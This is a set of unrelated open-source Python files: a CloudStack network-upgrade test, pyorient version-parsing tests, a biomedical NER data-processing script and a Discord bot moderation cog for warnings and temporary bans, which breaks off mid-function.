"Length of list VPN response should not be zero"
)
return
class TestNetworkUpgrade(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNetworkUpgrade,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.services["network_offering"],
conservemode=True
)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls._cleanup = [
cls.service_offering,
cls.network_offering
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(speed = "slow")
@attr(tags = ["advancedns"])
def test_01_nwupgrade_netscaler_conserve_on(self):
"""Test Nw upgrade to netscaler lb service and conserve mode ON
"""
# Validate the following
# 1. Upgrade a network with VR and conserve mode ON TO
# A network that has Lb provided by "Netscaler" and all other
# services provided by "VR" and Conserve mode ON
# 2. Have PF and LB rules on the same ip address. Upgrade network
# should fail.
# 3. Have SourceNat,PF and VPN on the same IP address. Upgrade of
# network should succeed.
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return a valid list of LB rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return a valid list of port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listPortForwardingRules should not be 0"
)
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with LB on Netscaler, other services in VR & conserve mode: ON"
)
ns_lb_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=True
)
self.cleanup.append(ns_lb_offering)
ns_lb_offering.update(self.apiclient, state='Enabled')
#Stop all the VMs associated with network to update cidr
self.debug("Stopping the VM: %s" % virtual_machine.name)
virtual_machine.stop(self.apiclient)
self.debug("Updating network offering for network: %s" %
self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
self.debug("Network upgrade failed as expected")
self.debug("Deleting LB Rule: %s" % lb_rule.id)
lb_rule.delete(self.apiclient)
self.debug("LB rule deleted")
# Assign VPN to source NAT
self.debug("Enabling VPN on source NAT")
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
self.debug("Upgrading the network: %s" % self.network.id)
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
networks = Network.list(
self.apiclient,
id=self.network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List Networks should return a valid list for given network ID"
)
self.assertNotEqual(
len(networks),
0,
"Length of list networks should not be 0"
)
network = networks[0]
self.assertEqual(
network.networkofferingid,
ns_lb_offering.id,
"Network offering ID should match with new offering ID"
)
return
@attr(speed = "slow")
@attr(tags = ["advancedns"])
def test_02_nwupgrade_netscaler_conserve_off(self):
"""Test Nw upgrade to netscaler lb service and conserve mode OFF
"""
# Validate the following
# 1. Upgrade a network with VR and conserve mode ON TO
# A network that has Lb provided by "Netscaler" and all other
# services provided by "VR" and Conserve mode OFF
# 2. Have PF and LB rules on the same ip address. Upgrade network
# should fail.
# 3. Have SourceNat,PF and VPN on the same IP address. Upgrade of
# network should fail.
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return a valid list of LB rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return a valid list of port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listPortForwardingRules should not be 0"
)
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with LB on Netscaler, other services in VR & conserve mode: OFF"
)
ns_lb_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=False
)
self.cleanup.append(ns_lb_offering)
ns_lb_offering.update(self.apiclient, state='Enabled')
#Stop all the VMs associated with network to update cidr
self.debug("Stopping the VM: %s" % virtual_machine.name)
virtual_machine.stop(self.apiclient)
self.debug("Updating network offering for network: %s" %
self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
self.debug("Network upgrade failed as expected")
self.debug("Deleting LB Rule: %s" % lb_rule.id)
lb_rule.delete(self.apiclient)
self.debug("LB rule deleted")
# Assign VPN to source NAT
self.debug("Enabling VPN on source NAT")
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
self.debug("Upgrading the network: %s" % self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
return
# ==== tests/test_orient_version.py (repo: spy7/pyorient, license: Apache-2.0) ====
import unittest
import pyorient
# db_name = "GratefulDeadConcerts"
# client = pyorient.OrientDB("localhost", 2424)
# client.set_session_token(True)
# cluster_info = client.db_open( db_name, "admin", "admin" )
# print(client.db_count_records())
__author__ = 'Ostico <ostico@gmail.com>'
class OrientVersionTestCase( unittest.TestCase ):
""" Orient Version Test Case """
def test_string1(self):
release = "2.2.0-rc1"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "rc1"
def test_string2(self):
release = "1.10.1"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert x.major == 1
assert x.minor == 10
assert x.build == 1
assert x.subversion == ''
def test_string3(self):
release = "2.0.19-rc2"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 0
assert x.build == 19
assert x.subversion == "rc2"
def test_string4(self):
release = "2.2.0 ;Unknown (build 0)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == ";Unknown (build 0)"
def test_string5(self):
release = "2.2-rc1 ;Unknown (build 0)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "rc1 ;Unknown (build 0)"
def test_string6(self):
release = "v2.2"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == ""
def test_string_version2(self):
release = "2.2.0 (build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "(build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
def test_new_string(self):
release = "OrientDB Server v2.2.0 (build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "(build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
# ==== src/processing_data.py (repo: lingluodlut/BioCreativeVII_DrugProt, license: Apache-2.0) ====
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 10 16:34:12 2020
@author: luol2
"""
import numpy as np
import io
import sys
#read ner text (word\tlabel), generate the list[[[w1,label],[w2,label]]]
def ml_intext(file):
fin=open(file,'r',encoding='utf-8')
alltexts=fin.read().strip().split('\n\n')
fin.close()
data_list=[]
label_list=[]
for sents in alltexts:
lines=sents.split('\n')
temp_sentece=[]
for i in range(0,len(lines)):
seg=lines[i].split('\t')
temp_sentece.append(seg[:])
label_list.append(seg[-1])
data_list.append(temp_sentece)
#print(data_list)
#print(label_list)
return data_list,label_list
def ml_intext_fn(alltexts):
# fin=io.StringIO(ml_input)
# alltexts=fin.read().strip().split('\n\n')
# fin.close()
data_list=[]
label_list=[]
for sents in alltexts:
lines=sents.split('\n')
temp_sentece=[]
for i in range(0,len(lines)):
seg=lines[i].split('\t')
temp_sentece.append(seg[:])
label_list.append(seg[-1])
data_list.append(temp_sentece)
#print(data_list)
#print(label_list)
return data_list,label_list
# write model predictions in CoNLL evaluation format [token answer predict]
def out_BIO(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_softmax(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
#print(raw_pre[0:2])
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = np.argmax(raw_pre[i][j])
#print(label_id)
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
# label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_BERT(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_BERT_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
#label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax_score_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
#label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_score = round(raw_pre[i][j][label_id],4)
label_tag = label_set[str(label_id)]
else:
label_tag='O'
label_score = 0.0
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\t'+str(label_score)+'\n')
fout.write('\n')
return fout.getvalue()
#generate char vocab
def char_vocab(infile,outfile_char):
fin=open(infile,'r',encoding='utf-8')
#fout=open(outfile,'w',encoding='utf-8')
fout_char=open(outfile_char,'w',encoding='utf-8')
char_vocab=['oov_char']
max_len=0
for line in fin:
if line.strip()!='':
seg=line.split('\t')
word_len=len(seg[0])
#if word_len<1000:
# fout.write(line)
if word_len>max_len:
max_len=word_len
print(seg[0])
for i in range(word_len):
if seg[0][i] not in char_vocab:
char_vocab.append(seg[0][i])
#else:
# fout.write(line)
fin.close()
#fout.close()
for ele in char_vocab:
fout_char.write(ele+'\n')
fout_char.close()
print('max_len:',max_len)
if __name__=='__main__':
# infile='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/data/pubmed_unlabel/mutation_disease_1990.ner_BIO'
# #outfile='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/data/pubmed_unlabel/mutation_disease_1990.ner_BIO_new'
# outfile_char='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/src/nn_model/vocab/char_vocab'
# #processing_text(file)
# char_vocab(infile,outfile_char)
a=[1,2,3]
print(a[:-1])
# ==== linsae/cogs/Warningsystem.py (repo: drakedeveloper/Linsae, license: Apache-2.0) ====
import discord
import time
import asyncio
from datetime import datetime
from discord.ext import tasks, commands
from tinydb import TinyDB, Query
class Warninggsystem(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
@commands.cooldown(1, 15, commands.BucketType.user)
@commands.has_permissions(ban_members=True)
async def warn(self, ctx, member: discord.Member, *reason):
await ctx.message.delete()
db1 = TinyDB('db/moderation/warn.json')
db = TinyDB('db/moderation/logchannel.json')
Log = Query()
Warn = Query()
li = db1.search(Warn.member_id == member.id)
lig = db.search(Log.guild_id == ctx.guild.id)
if member.guild_permissions.administrator:
msg1 = await ctx.message.channel.send("🚫, you can't warn a moderator!")
await msg1.delete(delay=5)
if not member.guild_permissions.administrator:
# the command author and the bot itself cannot be warned
if member.id != ctx.message.author.id and member.id != self.bot.user.id:
if len(li) > 1:
await ctx.guild.ban(member)
if len(lig) != 0:
for i in lig:
global channel
channel_id = i['channel_id']
channel = self.bot.get_channel(int(channel_id))
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value=f"-{channel.mention}")
embed.add_field(name="__Time stamp__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await channel.send(embed=embed)
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value=f"-{channel.mention}")
embed.add_field(name="__Time stamp__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
db1.remove(Warn.member_id == member.id)
await asyncio.sleep(7200)
await ctx.guild.unban(member)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value="-To set up the log channel, use ?logchannel [channel mention], or type ?help to learn more.")
embed.add_field(name="__Duration__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
db1.remove(Warn.member_id == member.id)
await asyncio.sleep(7200)
await ctx.guild.unban(member)
elif len(li) < 3:
db1.insert({'member_id': member.id, 'guild_id': ctx.guild.id, 'reason': ' '.join(reason),
'moderator': f"{ctx.message.author.name}#{ctx.message.author.discriminator}"})
li1 = db1.search(Warn.member_id == member.id)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Warn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li1)}")
embed.add_field(name="__Log channel__",
value="-To set up the log channel, use ?logchannel [channel mention], or type ?help to learn more.")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
if len(lig) != 0:
for i in lig:
channel_id1 = i['channel_id']
channel1 = self.bot.get_channel(int(channel_id1))
embed1 = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed1.add_field(name="__Type__", value="**Warn**")
embed1.add_field(name="__Moderator__", value=f"{ctx.message.author.mention}")
embed1.add_field(name="__Member__", value=f"{member.mention}")
embed1.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed1.add_field(name="__Warnings__", value=f"{len(li1)}")
embed1.add_field(name="__Log channel__",
value=f"{channel1.mention}")
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
await channel1.send(embed=embed1)
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Warn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li1)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
await msg.delete(delay=15)
if member.id == ctx.message.author.id or member.id == self.bot.user.id:
msg5 = await ctx.message.channel.send("🚫, you can't warn this user!")
await msg5.delete(delay=5)
@commands.command()
@commands.cooldown(1, 15, commands.BucketType.user)
@commands.has_permissions(ban_members=True)
async def dewarn(self, ctx, member: discord.Member, *reason):
db1 = TinyDB('db/moderation/warn.json')
db = TinyDB('db/moderation/logchannel.json')
Log = Query()
Warn = Query()
li = db1.search(Warn.member_id == member.id)
lig = db.search(Log.guild_id == ctx.guild.id)
if member.guild_permissions.administrator:
msg1 = await ctx.message.channel.send("🚫, you can't dewarn a moderator!")
await msg1.delete(delay=5)
if not member.guild_permissions.administrator:
if member.id != ctx.message.author.id and member.id != self.bot.user.id:
if len(li) == 0:
await ctx.message.channel.send("🚫, this member has no warnings!")
if len(li) != 0:
if len(lig) != 0:
for i in lig:
channel_id1 = i['channel_id']
channel1 = self.bot.get_channel(int(channel_id1))
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await channel1.send(embed=embed)
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value=f"-{channel1.mention}")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
db1.remove(Warn.member_id == member.id)
await ctx.message.delete()
await msg.delete(delay=15)
if len(lig) == 0:
embed = discord.Embed(title="__Moderation__", colour=0xb7e884, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Dewarn**")
embed.add_field(name="__Moderator__", value=f"-{ctx.message.author.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-{' '.join(reason)}")
embed.add_field(name="__Warnings__", value=f"-{len(li)}")
embed.add_field(name="__Log channel__",
value="-To set up the log channel, use ?logchannel [channel mention], or type ?help to learn more.")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.message.channel.send(embed=embed)
db1.remove(Warn.member_id == member.id)
await ctx.message.delete()
await msg.delete(delay=15)
if member.id == ctx.message.author.id or member.id == self.bot.user.id:
msg5 = await ctx.message.channel.send("🚫, you can't dewarn this user!")
await msg5.delete(delay=5)
@commands.command()
async def warnings(self, ctx, member: discord.Member = None):
db1 = TinyDB('db/moderation/warn.json')
if member is not None:
Warn = Query()
li = db1.search(Warn.member_id == member.id)
if len(li) == 0:
msg = await ctx.channel.send(f"{member.mention} has no warnings! All clear, sir.")
await msg.delete(delay=5)
if len(li) == 1:
for i in li:
embed = discord.Embed(title="__Warnings__", description=f"These are {member}'s warnings.",
colour=0xedd500, timestamp=datetime.utcnow())
embed.add_field(name="Only one warning", value=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""")
embed.add_field(name="__Notice__", value="To remove all the warnings do ?dewarn @member")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg1 = await ctx.channel.send(embed=embed)
await msg1.delete(delay=15)
if len(li) > 1:
embed = discord.Embed(title="__Warnings__", description=f"These are {member}'s warnings.",
colour=0xedd500,
timestamp=datetime.utcnow())
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg2 = await ctx.channel.send(embed=embed)
await msg2.delete(delay=30)
for i in li:
embed1 = discord.Embed(title="Warning", description=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""", colour=0xedd500, timestamp=datetime.utcnow())
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
msg3 = await ctx.channel.send(embed=embed1)
await msg3.delete(delay=30)
if member is None:
Warn = Query()
li = db1.search(Warn.member_id == ctx.message.author.id)
if len(li) == 0:
msg = await ctx.channel.send("You have no warnings! All clear, sir.")
await msg.delete(delay=5)
if len(li) == 1:
for i in li:
embed = discord.Embed(title="__Warnings__", description=f"These are {ctx.message.author}'s warnings.",
colour=0xedd500, timestamp=datetime.utcnow())
embed.add_field(name="Only one warning", value=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""")
embed.add_field(name="__Notice__", value="To remove all the warnings do ?dewarn @member")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg1 = await ctx.channel.send(embed=embed)
await msg1.delete(delay=15)
if len(li) > 1:
embed = discord.Embed(title="__Warnings__", description=f"These are {ctx.message.author}'s warnings.",
colour=0xedd500,
timestamp=datetime.utcnow())
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
msg2 = await ctx.channel.send(embed=embed)
await msg2.delete(delay=30)
for i in li:
embed1 = discord.Embed(title="Warning", description=f"""Moderator : {i['moderator']}
Reason: {i['reason']}
""", colour=0xedd500, timestamp=datetime.utcnow())
embed1.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed1.set_thumbnail(url=ctx.guild.icon_url)
msg3 = await ctx.channel.send(embed=embed1)
await msg3.delete(delay=30)
@warn.error
async def _warn(self, ctx, error):
